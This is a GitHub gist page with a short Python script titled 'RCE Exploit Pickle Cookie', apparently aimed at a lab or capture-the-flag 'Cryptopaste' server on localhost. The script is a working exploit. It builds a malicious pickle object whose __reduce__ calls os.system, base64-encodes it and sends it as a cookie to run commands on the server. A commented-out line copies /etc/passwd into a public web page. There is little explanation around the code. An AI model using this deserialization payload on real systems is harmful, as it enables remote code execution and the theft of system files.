Created
July 9, 2020 14:34
-
-
Save c7h/4f4a0ee80c17e332744c3d691b3feb0d to your computer and use it in GitHub Desktop.
RCE Exploit Pickle Cookie
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Cookie RCE for Cryptopaste server | |
""" | |
import requests | |
import os | |
import pickle | |
import base64 | |
target = "http://localhost:1337/" | |
def build_payload(command): | |
class Payload: | |
def __reduce__(self): | |
return (os.system, (command,)) | |
return pickle.dumps(Payload()) | |
def send_rce(command): | |
pcl = build_payload(command) | |
payload = base64.b64encode(pcl).decode('utf-8') | |
headers = {"Cookie": "paste="+payload} | |
ret = requests.get(target, headers=headers) | |
if ret.status_code == 200: | |
print(f"[+] command sent: $ {command}") | |
if __name__ == '__main__': | |
print(f"[?] Sending evil cookie to {target}...") | |
send_rce('touch pwnd.txt') | |
#send_rce('cat /etc/passwd >> static/index.html') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment